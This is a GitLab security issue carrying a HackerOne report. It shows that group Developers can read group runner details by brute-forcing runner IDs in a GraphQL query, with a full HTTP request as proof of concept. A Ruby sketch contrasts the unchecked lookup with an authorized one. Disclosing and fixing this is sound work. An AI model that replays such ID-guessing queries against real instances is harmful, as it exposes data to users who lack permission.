
Group Developers can view group runners

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2584372 by ashish_r_padelkar on 2024-07-02, assigned to GitLab Team:


Report

Summary

Hello,

As per this documentation https://docs.gitlab.com/ee/user/permissions.html, only Maintainers and Owners are allowed to view group runners. However, it is also possible for Group developers to view group runners using this access control issue.

[Screenshot attached: Screenshot_2024-07-02_at_12.19.10_PM.png]

Steps to reproduce

1. Create a group and a project underneath it.
2. Create a group runner at https://gitlab.com/groups/<GroupName>/-/runners.
3. Add a Developer user at https://gitlab.com/groups/<GroupName>/-/group_members.
4. Log in as the Developer user.
5. You won't see https://gitlab.com/groups/<GroupName>/-/runners, as you do not have access to runners as per the documentation; this is working as intended.
6. Now run the following GraphQL query.

POST /api/graphql HTTP/2  
Host: gitlab.com  
Cookie: 1  
Content-Length: 291  
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"  
X-Csrf-Token: 1  
Sec-Ch-Ua-Arch: "arm"  
Sec-Ch-Ua-Platform-Version: "13.2.1"  
Sec-Ch-Ua-Bitness: "64"  
Sec-Ch-Ua-Full-Version-List: "Not/A)Brand";v="8.0.0.0", "Chromium";v="126.0.6478.127", "Google Chrome";v="126.0.6478.127"  
Sec-Ch-Ua-Model: ""  
X-Gitlab-Version: 17.2.0-pre  
Sec-Ch-Ua-Platform: "macOS"  
X-Gitlab-Feature-Category: team_planning  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36  
Content-Type: application/json  
Sec-Ch-Ua-Full-Version: "126.0.6478.127"  
Accept: */*  
Baggage: sentry-environment=gprd,sentry-release=1  
Origin: https://gitlab.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://gitlab.com/groupjune2024/projectmay1/-/issues  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-GB,en;q=0.9  
Priority: u=1, i

{"operationName":"getRunnerForRegistration","variables":{"id":"gid://gitlab/Ci::Runner/39635406"},"query":"query getRunnerForRegistration($id: CiRunnerID!) {\n  runner(id: $id) {\n    id\n    description\n    ephemeralAuthenticationToken\n    runnerType\n    __typename\n shortSha\n }\n}\n"}  

7. You need to guess/brute-force the runner ID in the variables parameter above.
8. In the response you should see the runner details such as description, shortSha, runnerType, etc.

What is the current bug behavior?

Developer users are able to view group runner details if they can guess/brute-force the runner ID, which goes against their documentation.

What is the expected correct behavior?

Only Group Maintainers/Owners should see the group runner details.

Output of checks

This bug happens on GitLab.com GitLab Enterprise Edition 17.2.0-pre a257a0aca54

Regards,
Ashish

Impact

Group Developers can view group runners
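The report describes an object-level authorization gap: the UI hides the runners page from Developers, but the GraphQL `runner(id:)` query still returns runner details to a group member who supplies a valid runner ID. The following Ruby sketch is an added illustration, not GitLab's own code and not part of the HackerOne report; every class, constant and method name in it (`ACCESS_LEVELS`, `resolve_runner_unchecked`, `resolve_runner_checked`, `runner_fields`) is hypothetical. It places the unchecked lookup beside a resolver that enforces the documented Maintainer/Owner threshold against the runner's owning group, and that returns nil for both missing and forbidden IDs so that a denied lookup does not double as an existence oracle.

```ruby
# Added illustration (not GitLab's code): modelling the group-runner read
# authorization that the report says the GraphQL runner query lacks.
# All names below are hypothetical; the data is constructed for the example.

# Role thresholds in the style of GitLab access levels (constructed values).
ACCESS_LEVELS = { guest: 10, reporter: 20, developer: 30,
                  maintainer: 40, owner: 50 }.freeze

Runner = Struct.new(:id, :description, :runner_type, :short_sha, :group_id)
# memberships maps group_id => role symbol for the groups the user belongs to.
User = Struct.new(:name, :memberships)

# Constructed sample data: one group runner owned by group 100.
RUNNERS = {
  1 => Runner.new(1, 'shared build runner', 'GROUP_TYPE', 'abc1234', 100)
}.freeze

# Highest access level the user holds on the given group (0 = not a member).
def access_level(user, group_id)
  ACCESS_LEVELS.fetch(user.memberships[group_id], 0)
end

# Vulnerable shape: knowing a valid ID is the only "check". Any authenticated
# member who guesses the ID receives the record, which is the behaviour the
# report demonstrates for Developers.
def resolve_runner_unchecked(_user, id)
  RUNNERS[id]
end

# Hardened shape: object-level authorization on the runner's owning group.
# Developers (30) sit below the Maintainer threshold (40) and get nil, which is
# the same answer a non-existent ID produces, so the resolver gives no hint
# about which IDs exist.
def resolve_runner_checked(user, id)
  runner = RUNNERS[id]
  return nil if runner.nil?
  return nil if access_level(user, runner.group_id) < ACCESS_LEVELS[:maintainer]

  runner
end

# Shape the resolved record into the GraphQL field names used in the report
# (description, runnerType, shortSha). Note that ephemeralAuthenticationToken is
# deliberately not part of the exposed field set in this sketch.
def runner_fields(runner)
  return nil if runner.nil?

  { id: runner.id, description: runner.description,
    runnerType: runner.runner_type, shortSha: runner.short_sha }
end

if __FILE__ == $PROGRAM_NAME
  developer  = User.new('dev',   { 100 => :developer })
  maintainer = User.new('maint', { 100 => :maintainer })
  outsider   = User.new('other', { 200 => :owner })

  puts "unchecked, developer:  #{runner_fields(resolve_runner_unchecked(developer, 1)).inspect}"
  puts "checked,   developer:  #{runner_fields(resolve_runner_checked(developer, 1)).inspect}"
  puts "checked,   maintainer: #{runner_fields(resolve_runner_checked(maintainer, 1)).inspect}"
  puts "checked,   other grp:  #{runner_fields(resolve_runner_checked(outsider, 1)).inspect}"
end
```

The point of the hardened resolver is that the check is keyed on the object being read (the runner's owning group and the caller's role there), not on whether the caller can reach the page that lists runners; hiding a UI route is not an access control, and an unguessable ID is not one either.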

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: